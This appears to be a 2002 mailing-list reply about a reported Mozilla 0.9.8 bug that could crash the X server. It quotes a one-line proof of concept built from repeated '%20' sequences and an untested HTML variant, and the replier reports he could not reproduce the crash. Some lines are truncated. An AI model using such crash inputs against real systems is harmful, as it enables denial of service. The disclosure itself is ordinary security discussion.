From: NyQuist (NyQuistntlworld.com)
Date: Sun Feb 17 2002 - 11:48:17 CST
On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
> NOTE TO THE MODERATOR: This was sent yesterday but I guess didn't
> make it since this doesn't seem to affect a redhat itself, it affects
> the mozilla packages distributed by Ximian:
> The test system looks like:
> bash#~ rpm -qa | grep mozilla
> This was tested in both RH7.1 and 7.2 with Ximian Gnome (with all the
> updates).
> There is a bug in mozilla 0.9.8-1 which allows you
> to crash the X server.
> I won't go into details I'll just show the proof
> of concept.
> bash#~ mozilla `perl -e "print '%20' x 2618"`
> I haven't tested this but I guess:
> echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
> perhaps using "img src" or JavaScript...
> Best Regards
> Rodrigo Gutierrez <rodrigotrustix.com>
> Trustix AS http://www.trustix.com
On one box: rpm -qa | grep mozilla
Results in "www.perl -e "print %20 x 2618".com could not be found (lol)
perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
On other box: rpm -qa | grep mozilla
Results in same 'not found' error.
The attack.html (as per your script) results in "www.'perl not found".
So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in
-- NyQuist | Matthew Hall -- NyQuist at ntlworld dot com Sig: Microsoft sells you Windows. Linux gives you the whole house.